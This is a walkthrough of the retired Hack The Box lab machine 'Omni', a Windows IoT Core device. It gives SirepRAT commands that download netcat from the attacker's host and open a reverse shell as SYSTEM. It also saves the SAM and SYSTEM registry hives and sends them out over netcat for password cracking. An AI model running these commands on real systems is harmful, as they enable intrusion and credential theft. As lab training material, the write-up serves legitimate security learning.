This post documents the complete walkthrough of Omni, a retired vulnerable VM created by egre55, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
Background
Omni is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan probe to establish the open ports on the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.204 --rate=500
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-08-25 06:31:15 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8080/tcp on 10.10.10.204
Discovered open port 29820/tcp on 10.10.10.204
Discovered open port 29819/tcp on 10.10.10.204
Discovered open port 29817/tcp on 10.10.10.204
Discovered open port 5985/tcp on 10.10.10.204
Discovered open port 135/tcp on 10.10.10.204
Interesting list of open ports. Let’s do one better with nmap, scanning the discovered ports to establish their services.
# nmap -n -v -Pn -p135,5985,8080,29817,29819,29820 -A --reason 10.10.10.204 -oN nmap.txt
...
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
5985/tcp open upnp syn-ack ttl 127 Microsoft IIS httpd
8080/tcp open upnp syn-ack ttl 127 Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown syn-ack ttl 127
29819/tcp open arcserve syn-ack ttl 127 ARCserve Discovery
29820/tcp open unknown syn-ack ttl 127
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Judging from the Windows Device Portal realm, it looks like we have a Windows IoT Core device on hand!
Foothold
But hold up, what’s 29820/tcp? Googling for “windows iot core 29820” led me to SirepRAT.
SirepRAT - RCE as SYSTEM on Windows IoT Core
Using SirepRAT, I was able to transfer nc64.exe (renamed to cute.exe) to the device, with the intention of running a reverse shell back to me.
# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "powershell.exe" --args "iwr http://10.10.14.25/nc64.exe -outf \\cute.exe" --v
Run nc64.exe like so.
# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "cmd.exe" --args "/c start \\cute.exe 10.10.14.25 1234 -e cmd.exe" --v
And we have shell, as NT AUTHORITY\SYSTEM no less!
Protected by DPAPI
Finding the location of user.txt is simple. However, this is not your usual user.txt.
The flag is protected by DPAPI, and a secret protected with user-scope DPAPI can only be decrypted under the account that protected it, which means I have to get a shell as app in order to decrypt it. More on that later…
Dumping the SAM
Since we have SYSTEM privileges, it’s trivial to dump the SAM. Save the hives as files like so.
C:\>reg save hklm\sam SAMS
C:\>reg save hklm\system SYSTEM
I’ll use nc64.exe (renamed as cute.exe) to transfer the files over to my machine for offline cracking with John the Ripper.
On the remote machine, run the following command.
C:\cute.exe 10.10.14.25 8888 < SAMS
On your machine, run the following command.
# nc -lnvp 8888 > SAMS
Do likewise for SYSTEM. Once you have SAMS and SYSTEM on your machine, dump the NT hash with Impacket’s secretsdump.py.
John the Ripper
We have app’s password (mesh5143).
Windows Device Portal
Armed with app’s password, we can finally explore what’s inside Windows Device Portal. Turns out we can run commands as app, which means we’ll be getting a shell as app!
And here we go…
Decrypting user.txt
I got all the information about decrypting PSCredential objects from here. The key to displaying the encrypted strings is the Import-CliXml cmdlet. Here’s how.
That’s it. It is this simple.
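As an added illustration (not from the original post), here is a round trip showing why Import-CliXml only works from the right account: a PSCredential exported with Export-CliXml stores its password as a user-scope DPAPI blob, so only the account that exported it (on this box, app) can read it back. The file path and the sample secret below are constructed.

```powershell
# Added illustration, not the box's own files: how a PSCredential exported with
# Export-CliXml is bound to the exporting user via DPAPI, and why only that user
# can rehydrate it.
$path = Join-Path $env:TEMP 'demo-cred.xml'   # constructed, hypothetical path

# 1. Build a credential with a constructed sample secret and export it.
$secret = ConvertTo-SecureString 'S3cretValue!' -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential('demo-user', $secret)
$cred | Export-CliXml -Path $path

# 2. On disk the password is not plaintext: the <SS N="Password"> element holds
#    a DPAPI-protected blob serialised as hex, which is what the flag file looked like.
Select-String -Path $path -Pattern '<SS N="Password">' |
    ForEach-Object { $_.Line.Substring(0, [Math]::Min(80, $_.Line.Length)) + '...' }

# 3. Only the same Windows account (on the same machine) can decrypt it.
try {
    $imported = Import-CliXml -Path $path -ErrorAction Stop
    # Reveals the sample secret when run as the exporting user.
    $imported.GetNetworkCredential().Password
}
catch {
    # Any other account fails at the DPAPI unprotect step (typically "Key not valid
    # for use in specified state"); this is why a SYSTEM shell was not enough and
    # the author needed a shell as app.
    Write-Warning "Import failed: $($_.Exception.Message)"
}

Remove-Item $path -ErrorAction SilentlyContinue
```

Run it once as the account that exported the file and once as a different account to see both branches.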
Privilege Escalation
While we are at it, here’s the administrator’s password, protected by DPAPI.
Of course it has something to do with Internet of Things.
Getting root.txt
Getting a shell as administrator is similar. Run a command from Windows Device Portal. With the administrator shell, we can decrypt root.txt like so.